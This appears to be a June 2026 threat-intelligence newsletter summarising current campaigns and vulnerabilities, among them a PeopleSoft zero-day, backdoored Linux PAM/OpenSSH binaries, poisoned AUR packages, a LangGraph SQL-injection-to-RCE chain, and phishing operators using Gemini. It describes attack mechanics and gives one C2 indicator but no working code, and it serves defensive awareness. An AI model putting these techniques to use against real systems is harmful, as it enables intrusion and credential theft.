BORDER CYBER GROUP — Monday, June 16, 2026 By Jonathan Brown

PRIORITY SCALE 5 — Immediate action required 4 — Patch or monitor this week 3 — Important trend 2 — Background awareness 1 — Strategic context

──────────────

ShinyHunters Ran a 14-Day ERP Zero-Day Campaign Against Higher Education Before Oracle Knew the Flaw Existed PRIORITY: 5

The damage was done before the advisory existed.

Timeline: May 27, attackers begin exploiting CVE-2026-35273. June 9, ShinyHunters posts stolen University of Nottingham data — 40 GB of student billing and personal records — to their data leak site. June 10, Oracle publishes its out-of-band advisory. The gap is fourteen days. Mandiant CTO Charles Carmakal publicly confirmed the zero-day exploitation window, attributing the campaign to UNC6240, the cluster Mandiant associates with ShinyHunters.

The flaw is an unauthenticated RCE vulnerability in PeopleSoft's Environment Management Hub component (PSEMHUB), rated CVSS 9.8, affecting PeopleTools versions 8.61 and 8.62. Across that fourteen-day window, UNC6240 worked through roughly 300 vulnerable instances at more than 100 organizations. Post-compromise, attackers deployed customized MeshCentral agents — hardcoded to reach C2 at wss://azurenetfiles.net:443/agent.ashx — then executed lateral movement via a named script before exfiltrating and publishing data on victims who declined to respond.

The education sector concentration is consistent with deliberate prioritization rather than opportunism: PeopleSoft is the standard ERP stack for universities, shared configurations enable scripted exploitation at scale, and student records carry the FERPA and GDPR regulatory exposure that maximizes extortion leverage. Oracle's remediation consists of mitigations, not patches — introducing misconfiguration risk that a direct software fix eliminates. Any organization running PSEMHUB reachable from outside the firewall should treat that as the primary exposure and lock those endpoints down immediately.

Watch for: Additional named victims on ShinyHunters' DLS in the next 48–72 hours — the group told The Register on June 11 that victim outreach had only just begun.

Sources: Mandiant/GTIG via SecurityWeek, June 12, 2026; The Hacker News, June 11, 2026; The Register, June 11, 2026; CSO Online, June 12, 2026; Oracle out-of-band advisory, June 10, 2026.

──────────────

Volt Typhoon's Reconnaissance Arm Rebuilt After 2024 Takedown — JDY Botnet Has Doubled and Is Scanning U.S. Military Networks PRIORITY: 4

The KV-botnet takedown in early 2024 didn't kill the reconnaissance layer — it separated it. Lumen's Black Lotus Labs reported this week that JDY, a scanning cluster previously embedded within KV-botnet and associated with Volt Typhoon, has expanded from roughly 650 compromised devices in early 2024 to over 1,500 SOHO and IoT devices today, spanning Cisco, Ubiquiti, Hikvision, DrayTek, Araknis, Mimosa Networks, and Linksys hardware distributed across the United States, Europe, and Asia. JDY functions as a centrally controlled fingerprinting engine — it retrieves encrypted scanning tasking from a dispatch service via hidden Tor C2, identifies exposed services by protocol signature and banner pattern rather than port state alone, and returns structured reconnaissance data for downstream exploitation pipelines. Command and control is nearly constant and highly automated; some victim devices are also managed through Platypus, an open-source reverse shell framework.

The targeting data is the significant signal. Lumen's telemetry shows the majority of IP addresses JDY scanned are associated with U.S. military and related defense networks. Separately, Black Lotus Labs observed JDY scan volume against Fortinet devices spike within hours of this week's disclosure of CVE-2026-35616 — illustrating how directly this infrastructure feeds active vulnerability exploitation. This is the sort of reconnaissance infrastructure commonly associated with pre-positioning for future operational access rather than conventional criminal monetization, which is consistent with what China-nexus actors have historically used KV and adjacent clusters for.

Watch for: JDY scanning activity correlating with newly disclosed edge device CVEs within 24 hours of publication — this now appears to be the established operational cadence.

Sources: Lumen Black Lotus Labs report, June 10, 2026; BleepingComputer, June 10, 2026; The Hacker News, June 10, 2026.

──────────────

Velvet Ant's Operation Highland: China-Nexus Group Backdoored Linux PAM and OpenSSH Itself and Stayed Invisible for Nearly a Decade PRIORITY: 3

Sygnia disclosed this week that the China-nexus group it tracks as Velvet Ant — previously documented exploiting Cisco NX-OS switch firmware in 2024 — executed a long-dwell campaign it names Operation Highland in which attackers backdoored PAM and OpenSSH binaries on Linux hosts in an air-gapped-adjacent network, with earliest forensic traces dating to 2016. This is the long-dwell patience story of the year so far.

The method bypassed traditional malware detection entirely. Attackers didn't drop new executables that scanners might flag — they replaced trusted system authentication programs with backdoored versions. Nine distinct variants of the modified PAM login module were recovered: some accepting a secret master password for silent re-entry, others quietly logging all credential input as users authenticated normally. OpenSSH was similarly modified to record every typed command and credential, with a built-in toggle to disable logging during live operator sessions. Because the target network lacked direct internet access, Velvet Ant first staged through perimeter systems before pivoting inward. The cleanup risk is non-trivial: replacing the wrong PAM binary on a live production system can lock administrators out entirely. This is the same actor, the same patience model, now documented from network switches all the way down to the authentication layer of the OS itself. File integrity monitoring on PAM and OpenSSH binaries is the detection primitive here — not antivirus, not network signatures.

Watch for: Sygnia's full Operation Highland technical report for IOC hashes of the nine PAM variants, which are the artifacts that matter for any retrospective threat hunt on Linux infrastructure.

Sources: Sygnia research, reported by The Hacker News, June 12, 2026.

──────────────

Ivanti Sentry CVE-2026-10520 (CVSS 10.0): From Disclosure to Confirmed Backdoor in 24 Hours PRIORITY: 5

The sequence: Ivanti discloses CVE-2026-10520 — a pre-authentication OS command injection in Sentry yielding root-level code execution, CVSS 10.0 — on June 9. WatchTowr publishes a technical analysis and proof-of-concept the following day. By June 11, Shadowserver Foundation is reporting large-scale exploitation attempts against internet-exposed Sentry instances, and confirms at least two of the 19 vulnerable instances they are tracking have been backdoored. CISA adds CVE-2026-10520 to the KEV catalog following honeypot exploitation reports. Total elapsed time from Ivanti advisory to confirmed backdoor placement: under 24 hours.

The companion flaw, CVE-2026-10523 (CVSS 9.9), is an authentication bypass allowing unauthenticated creation of arbitrary administrator accounts — same affected versions, same patch. Ivanti notes the vulnerable API on CVE-2026-10520 requires access to management port 8443, and that EPMM-managed deployments are protected by mTLS — but internet-exposed management interfaces exist in the wild, which is the exposure. Ivanti's historical track record means this is exactly what the threat model predicts. The federal KEV remediation deadline was June 14.

Watch for: Actor attribution on the backdoored Sentry instances — Ivanti Sentry has previously attracted both DPRK and PRC-linked operators, and the speed of exploitation is consistent with pre-staged tooling rather than opportunistic scanning.

Sources: Ivanti advisory, June 9, 2026; WatchTowr analysis, June 10, 2026; Rapid7 blog, June 10–11, 2026; Help Net Security, June 10, 2026; Dark Reading, June 12, 2026.

──────────────

Atomic Arch: 400+ AUR Packages Backdoored With a Rust Credential Stealer and an eBPF Rootkit That Defeats Standard Forensic Tools PRIORITY: 4

Starting June 11, an attacker compromised more than 400 packages in the Arch User Repository by taking over maintainer accounts and adopting at least 20 orphaned packages, then modifying PKGBUILD scripts to invoke npm and pull in a malicious package called atomic-lockfile. That package installs a Rust binary (named deps) that sweeps developer credentials and secrets. When it executes with root — which AUR helpers like yay, paru, pikaur, and aurutils commonly do — it additionally loads an eBPF rootkit that intercepts directory listing calls, hiding PIDs, process names, socket inodes, and its own service files from ps, ss, netstat, and /proc. Standard live-response forensic tools on a rootkit-positive host are not trustworthy for cleanup. Sonatype tracks the campaign as Sonatype-2026-003775 (CVSS 8.7). By June 12, a second wave reportedly pushed the total past 1,500 compromised packages per community tracking.

Any AUR package built or updated on or after June 11 requires a full PKGBUILD diff review. Community detection scripts are available via GitHub (lenucksi/aur-malware-check). The official Arch repositories were not affected.

Watch for: Attribution on the maintainer account takeover mechanism — whether credential stuffing or social engineering determines whether this pattern is portable to npm, PyPI, and RubyGems at meaningful scale.

Sources: Sonatype research, Sonatype-2026-003775, June 11–12, 2026; BleepingComputer, June 12, 2026; The Hacker News, June 12, 2026.

──────────────

Check Point Research: SQLi Chains to Full RCE in LangGraph's Checkpoint Layer — 46 Million Monthly Downloads at Risk PRIORITY: 4

Check Point Research published the attack chain on June 12. Step one: CVE-2025-67644 (CVSS 7.3), SQL injection in LangGraph's SQLite checkpointer via the get_state_history() endpoint, exploitable when user-controlled filter input is accepted. Step two: CVE-2026-28277 (CVSS 6.8), unsafe msgpack deserialization when a checkpoint is loaded. The attacker uses the SQLi to write a malicious checkpoint; deserialization of that checkpoint achieves unauthenticated RCE on the server. A third parallel issue, CVE-2026-27022 (CVSS 6.5), introduces the same injection class into the Redis checkpointer backend. Patches exist: langgraph-checkpoint-sqlite 3.0.1+, langgraph 1.0.10+, langgraph-checkpoint-redis 1.0.2+. LangChain's managed cloud platform is not affected.

The structural point is not the specific CVEs — it is that AI agent frameworks carry privileged credentials, long-lived API keys, and trusted external system identities. A mid-severity SQLi in a standard application is a data exposure risk. The same SQLi in an agent runtime with CRM access, internal API credentials, and operator permissions is a full enterprise access event. That gap is the security debt accumulating across every team that is deploying agentic infrastructure without the same scrutiny they apply to privileged service accounts.

Watch for: Exploitation scanning against exposed LangGraph get_state_history() endpoints — the attack chain is public, the affected population numbers in the thousands of production deployments.

Sources: Check Point Research ("From SQLi to RCE — Exploiting LangGraph's Checkpointer"), June 12, 2026; The Hacker News, June 12, 2026.

──────────────

Google Files Suit Against Chinese PhaaS Operator for Weaponizing Gemini — FBI Ties Network to $1.9 Billion in Losses PRIORITY: 3

Google filed suit in Manhattan federal court on June 12 against Outsider Enterprise, a China-based phishing-as-a-service network the FBI links to an estimated 3.87 million stolen credit card numbers and approximately $1.9 billion in losses since July 2023. The complaint alleges operators actively encouraged each other to use Gemini to generate custom phishing page code, which was imported directly into the Outsider toolkit — a library of over 290 pre-built templates impersonating Google, YouTube, USPS, financial institutions, and toll services — and distributed via Telegram bot at $88 per week. Between November 2025 and April 2026, Google detected over 1.59 million malicious URLs tied to Outsider infrastructure. A coordinated action, Operation Ghost Hook under the FBI's broader Operation Riptide, ran in parallel: domain seizures, approximately $100,000 USDT confiscated from Outsider payment wallets, and thousands of phishing domains rerouted to an FBI splash page. The Outsider Telegram bot was also leveraged by the FBI to gather customer data for follow-on investigation.

Watch for: Whether Operation Riptide surfaces the Outsider customer network — the bot access path is now a documented investigative instrument for identifying downstream criminal affiliates.

Sources: Google complaint, June 12, 2026; The Hacker News, June 12, 2026; Bank Info Security, June 12, 2026; Decrypt, June 14, 2026.

──────────────

Fortinet CVE-2026-25089: Pre-Auth Command Injection in the Security Sandbox, JDY Scanned for It Within Hours PRIORITY: 4

Fortinet disclosed CVE-2026-25089 (CVSS 9.8) on June 9 — an OS command injection in the FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS web UI, exploitable unauthenticated via crafted HTTP requests to the management interface. The flaw is a second-order injection path in the "start VNC" GUI feature. Patches are in FortiSandbox 5.0.6 and 4.4.9. Fortinet reported no known exploitation at disclosure time. However, per Lumen's Black Lotus Labs, JDY botnet scanning of Fortinet devices increased within hours of the advisory — which is the established tempo for China-nexus reconnaissance infrastructure feeding downstream exploitation pipelines. Compromising a security sandbox gives an attacker visibility into what the organization is analyzing and a foothold in a system that typically has broad network access for detonation purposes.

Watch for: CISA KEV addition — and any exploitation confirmation would elevate this to an immediate-action item given the foothold value of sandbox access.

Sources: Fortinet advisory FG-IR-26-141, June 9, 2026; SecurityWeek, June 10, 2026; CSA Singapore advisory AL-2026-073; Lumen Black Lotus Labs, June 10, 2026.

──────────────

Android CVE-2025-48595 Was Exploited Before the June 2 Patch — CISA KEV Deadline Has Now Passed for Federal Agencies PRIORITY: 4

Google's June 2 Android Security Bulletin confirmed active exploitation of CVE-2025-48595 (CVSS 8.4) prior to patching — a true zero-day. The flaw is an integer overflow in multiple locations within the Android Framework enabling local privilege escalation without user interaction, affecting Android 14, 15, 16, and 16 QPR2. CISA added it to the KEV catalog on June 2 with a federal civilian remediation deadline of June 5. The attack vector is local, indicating delivery most likely via a malicious application installed through social engineering, followed by escalation to system-level privileges. No exploit chain details have been made public, and Google has not attributed exploitation. The federal deadline has passed. For enterprise MDM environments managing Android estates that include non-Pixel, carrier-locked, or budget-tier devices on Android 14, patch availability may be weeks or months out — that is the live exposure window.

Watch for: Actor attribution on CVE-2025-48595 exploitation — the "limited, targeted" language from Google is consistent with a commercial spyware operator or state-affiliated mobile intrusion team.

Sources: Google Android Security Bulletin, June 2, 2026; CISA KEV catalog, June 2, 2026; Help Net Security, June 2, 2026.

──────────────

Operation Ramz: INTERPOL Names SniperDz After a Four-Month Silence — Nine Years of PhaaS Operations, 201 Arrests PRIORITY: 2

INTERPOL concluded Operation Ramz in February 2026 — 201 arrests, 53 servers seized across 13 MENA countries — but deliberately withheld the platform name in its May announcement. Group-IB named it on June 11: SniperDz, a PhaaS network active since 2015 that rebranded repeatedly as Joker Dz, Storm Dz, and Spam Dz. The primary developer and administrator, identified by alias as Guedz, was arrested by the Algerian National Police acting on intelligence compiled and shared by Group-IB. The platform offered 80 phishing template kits, hosting, and operational support via Telegram and Facebook, targeting 30+ major platforms across 20,000+ domains. The four-month gap between operation conclusion and public naming is the detail worth noting — it suggests the seized server hardware was being worked for follow-on intelligence before the name was released. INTERPOL disseminated nearly 8,000 data packages to participating countries to support future prosecutions.

Watch for: Follow-on criminal charges from those intelligence packages — this was as much a collection operation as an arrest operation.

Sources: INTERPOL press release, May 18, 2026; Group-IB press release, June 11, 2026; Infosecurity Magazine, June 12, 2026; The Hacker News, June 12, 2026.

───────────────────────────────────────────────────

Jonathan Brown | Border Cyber Group bordercybergroup.com Independent cybersecurity research and investigative journalism. If this feed is valuable to your work, consider supporting BCG directly.